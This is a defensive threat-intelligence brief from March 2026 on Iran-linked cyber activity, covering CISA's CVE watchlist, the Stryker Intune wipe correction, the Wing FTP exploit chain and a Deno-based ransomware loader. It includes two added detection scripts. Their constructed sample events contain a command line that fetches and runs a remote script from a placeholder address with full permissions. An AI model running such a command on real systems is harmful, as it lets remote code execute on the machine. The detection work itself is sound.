CRITICAL 12 min read 17 Mar 2026

The Doctrine Is the Threat: War Week 3 Full-Day Brief

Today produced the clearest strategic picture of the Iran-US conflict's cyber dimension since it began on 28 February. Two of Iran's most senior national security officials were killed, named Iranian cyber operators were physically eliminated — and the attacks continued anyway. Decapitation is not deterrence when the infrastructure is distributed.

Key findings
01
Command Decapitation Did Not Deter — Operations Continued Without Pause
CRITICAL
Israeli strikes killed Ali Larijani (SNSC Secretary) and Gholamreza Soleimani (Basij Commander). Named Iranian cyber operators physically eliminated. Iranian operations continued without detectable pause. Distributed infrastructure and decentralised proxy layer (Handala, Void Manticore, MuddyWater) sustains operations regardless of IRGC leadership status.
02
CISA CVIE: 136 Iranian-Targeted CVEs Across All 16 US Critical Infrastructure Sectors
CRITICAL
Most authoritative Iranian targeting watchlist published to date. Over 3,100 US entities estimated to have exposure. Qualys operationalised as VMDR feature same day. Advisory layer for client-specific cross-referencing does not yet exist as a packaged service.
03
Stryker Forensic Correction: Existing Intune Admin Account — Not New Global Admin
HIGH
TechCrunch and WSJ correction: the attacker used a compromised existing Intune admin account. Detection rules written after the early reporting, which key on new account creation, do not cover this case. NHS UK procurement formally affected; Day 11 is the longest documented sustained US medtech disruption.
04
Wing FTP Exploit Chain Active: CVE-2025-47813 + CVE-2025-47812 Chained in Production
HIGH
Info disclosure leaks installation path, enabling targeted RCE. Huntress confirmed attackers executing malicious Lua files, running recon, and installing RMM tools. Both patched in Wing FTP 7.4.4+. Federal deadline March 30.
05
World Leaks Encryption Capability Confirmed — Exfil-Only Characterisation Superseded
HIGH
Darktrace's second case study confirms that World Leaks (formerly Hunters International) deploys full ransomware encryption as well as running exfil-only extortion. Detection models keying on encryption events will miss the exfil-only cases; behavioural baseline models catch both.
06
LeakNet: Deno Fileless Loader — Near-Zero EDR Visibility in Production Ransomware
HIGH
ClickFix fake CAPTCHA deploys legitimate Deno JavaScript runtime as in-memory loader. Deno is code-signed, trusted by default in most EDR rulesets. Three independent sources confirmed same day.
07
Agentic Offensive Tools Now Startup-Accessible — Tenzai Top 1% of 125K Competitors
HIGH
Israeli startup using OpenAI and Anthropic tooling places in top 1% across six elite cybersecurity competitions. Third independent offensive AI signal in one week alongside PROMPTFLUX and Slopoly/Hive0163.
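The EDR gap in finding 06 exists because Deno is a signed, legitimate binary, so image-level trust lets it run; what remains to key on is how it is launched. The following is an added example, not code from the brief or from any vendor: a weighted hunt over constructed Sysmon-style process-creation events that scores a deno launch by its parent process, remote source URL, allow-all permissions, eval use and binary location. The field names, the ClickFix parent set, the weights and the sample events (including the TEST-NET-3 address) are assumptions to tune against your own telemetry.

```python
"""Hunt for a LeakNet-style Deno loader in process-creation telemetry.

Added example. Events mimic Sysmon Event ID 1 fields (Image, CommandLine,
ParentImage) but are constructed; parent set, weights and paths are assumptions.
"""
import re

# Constructed events: a developer run, a ClickFix-style loader, and a dev one-liner.
EVENTS = [
    {"ProcessId": 4012, "Image": r"C:\Users\dev\.deno\bin\deno.exe",
     "CommandLine": r"C:\Users\dev\.deno\bin\deno.exe run --allow-net main.ts",
     "ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.21\WindowsTerminal.exe"},
    {"ProcessId": 5180, "Image": r"C:\Users\victim\AppData\Local\Temp\deno.exe",
     "CommandLine": r"deno.exe run -A https://203.0.113.25/verify.js",  # constructed URL
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"ProcessId": 6022, "Image": r"C:\Users\dev\.deno\bin\deno.exe",
     "CommandLine": r'deno.exe eval "console.log(1+1)"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Assumed ClickFix launch chain: Win+R or a shell spawned from the fake CAPTCHA.
CLICKFIX_PARENTS = {"explorer.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Assumed weights: a remote script with full permissions is the core of the pattern.
WEIGHTS = {"shell_parent": 1, "remote_source": 2, "allow_all": 2, "eval": 1, "temp_binary": 1}


def _base(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event; 0 for non-deno images."""
    if _base(ev["Image"]) not in ("deno.exe", "deno"):
        return 0, []
    cmd = ev["CommandLine"]
    tokens = cmd.split()
    reasons = []
    if _base(ev["ParentImage"]) in CLICKFIX_PARENTS:
        reasons.append("shell_parent")
    if re.search(r"https?://", cmd, re.I):          # script fetched at runtime
        reasons.append("remote_source")
    if any(t in ("-A", "--allow-all") for t in tokens):  # deno's all-permissions flag
        reasons.append("allow_all")
    if len(tokens) > 1 and tokens[1] == "eval":      # inline code, nothing on disk
        reasons.append("eval")
    if re.search(r"\\(temp|tmp|downloads|appdata\\roaming)\\", ev["Image"], re.I):
        reasons.append("temp_binary")                # runtime dropped outside a dev install
    return sum(WEIGHTS[r] for r in reasons), reasons


def hunt(events, threshold=3):
    """Events whose score reaches `threshold`; a bare dev `eval` from cmd.exe stays below it."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"ProcessId": ev["ProcessId"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit)
```

The threshold keeps a developer typing `deno eval` in a terminal below the alert line while a remote script run with `-A` from a PowerShell parent scores well above it; adjust the weights to your own developer population rather than allow-listing the binary.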

The defining finding: two of Iran's most senior national security officials were killed, named Iranian cyber operators were physically eliminated — and the attacks continued anyway. Decapitation is not deterrence when the infrastructure is distributed.

Israeli strikes killed Ali Larijani, Secretary of Iran's Supreme National Security Council, and Gholamreza Soleimani, Commander of the Basij. Forbes confirmed that US and Israeli strikes also killed at least two named Iranian cyber operators, including Mohammad Mehdi Farhadi Ramin, DOJ-charged in 2020 for aerospace and defence hacking. Iranian operations continued without detectable pause. Iran's hacktivist proxy layer (Handala, Void Manticore, MuddyWater) is sufficiently decentralised to sustain operations regardless of who in the IRGC is still alive.

CISA published a Cyber Vulnerability Insights Estimate cataloguing 136 CVEs that Iranian government-sponsored actors have targeted or exploited — the most authoritative Iranian targeting watchlist published to date, covering all 16 US critical infrastructure sectors.

The Stryker forensic picture was corrected: the attacker used a compromised existing Intune administrator account, not a newly created Global Admin. Detection rules updated after early Stryker reporting that target new account creation have a gap. NHS UK procurement is now formally affected — Day 11 is the longest documented sustained US medtech disruption from a destructive cyberattack.

Six defensive actions with the highest signal-to-noise ratio:
1. Update Intune detection rules to alert on bulk Wipe commands issued by existing privileged accounts, not only by newly created ones.
2. Patch Hikvision CVE-2017-7921 and Rockwell CVE-2021-22681: both are in CISA KEV with a March 26 deadline, nine days from today.
3. Enable Signal Registration Lock for senior leaders.
4. Update Chrome to 146.0.7680.75 or later: March 27 federal deadline.
5. Patch any Java services using pac4j-jwt: CVE-2026-29000, CVSS 10.0, public PoC live.
6. Upgrade Wing FTP Server to 7.4.4 or later: March 30 deadline, confirmed RCE chain active.
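The Stryker correction above and action (1) describe the same detection gap: a rule that fires on wipes from a newly created admin never sees an attacker who already holds an existing Intune admin account. The following is an added example, not code from the brief or from Microsoft, showing both rule shapes over a constructed audit log. The events only mimic the shape of Graph deviceManagement/auditEvents; the activityType strings, field names, the privileged-account inventory and the threshold are assumptions to verify against a real export.

```python
"""Intune audit-log detection: bulk wipes from an existing privileged account.

Added example. Events are constructed; activityType strings and field names
are assumptions modelled on Graph deviceManagement/auditEvents.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts that already hold an Intune administrator role (assumed inventory).
PRIVILEGED_ACCOUNTS = {"svc-intune-admin@corp.example", "it-ops@corp.example"}

# Constructed events. There is no "Add user" or role-assignment event for
# svc-intune-admin: the account pre-exists, which is the corrected Stryker pattern.
AUDIT_EVENTS = [
    {"time": "2026-03-06T14:00:00Z", "activityType": "Patch ManagedDevice",
     "actor": "svc-intune-admin@corp.example", "target": "LAPTOP-0003"},
    {"time": "2026-03-07T02:10:00Z", "activityType": "wipe ManagedDevice",
     "actor": "svc-intune-admin@corp.example", "target": "LAPTOP-0001"},
    {"time": "2026-03-07T02:10:05Z", "activityType": "wipe ManagedDevice",
     "actor": "svc-intune-admin@corp.example", "target": "LAPTOP-0002"},
    {"time": "2026-03-07T02:10:10Z", "activityType": "wipe ManagedDevice",
     "actor": "svc-intune-admin@corp.example", "target": "LAPTOP-0004"},
    {"time": "2026-03-07T02:10:15Z", "activityType": "wipe ManagedDevice",
     "actor": "svc-intune-admin@corp.example", "target": "LAPTOP-0005"},
    {"time": "2026-03-07T02:10:20Z", "activityType": "wipe ManagedDevice",
     "actor": "svc-intune-admin@corp.example", "target": "LAPTOP-0006"},
    {"time": "2026-03-07T02:10:25Z", "activityType": "wipe ManagedDevice",
     "actor": "svc-intune-admin@corp.example", "target": "LAPTOP-0007"},
    {"time": "2026-03-07T09:30:00Z", "activityType": "wipe ManagedDevice",
     "actor": "it-ops@corp.example", "target": "LAPTOP-0099"},  # routine single offboarding wipe
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def is_wipe(ev):
    return ev["activityType"].lower().startswith("wipe")


def new_admin_account_rule(events):
    """Rule shape written after the early reporting: wipes by an account that was
    created in the same log window. Returns the actors it would flag."""
    created = {ev["target"] for ev in events if ev["activityType"] == "Add user"}
    return sorted({ev["actor"] for ev in events if is_wipe(ev) and ev["actor"] in created})


def bulk_wipe_rule(events, privileged=PRIVILEGED_ACCOUNTS, threshold=5,
                   window=timedelta(minutes=10)):
    """Corrected rule: alert when any privileged account issues at least `threshold`
    wipe commands inside `window`, regardless of how old the account is."""
    by_actor = defaultdict(list)
    for ev in events:
        if is_wipe(ev) and ev["actor"] in privileged:
            by_actor[ev["actor"]].append(parse_ts(ev["time"]))
    alerts = []
    for actor, times in by_actor.items():
        times.sort()
        best, start, j = 0, None, 0
        for i, t0 in enumerate(times):  # sliding window over sorted timestamps
            while j < len(times) and times[j] - t0 <= window:
                j += 1
            if j - i > best:
                best, start = j - i, t0
        if best >= threshold:
            alerts.append({"actor": actor, "count": best,
                           "window_start": start.isoformat()})
    return alerts


if __name__ == "__main__":
    print("new-account rule flags:", new_admin_account_rule(AUDIT_EVENTS))
    print("bulk-wipe rule flags:", bulk_wipe_rule(AUDIT_EVENTS))
```

On this log the new-account rule returns nothing, while the bulk-wipe rule flags svc-intune-admin with six wipes in under a minute and leaves the single routine wipe alone. In production, populate the privileged set from the tenant's role assignments rather than a static list, and keep the account-creation rule as well: the two cover different paths to the same wipe.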

Tags: iran, decapitation, cisa-cvie, stryker, world-leaks, leaknet, agentic-ai, ics-ot
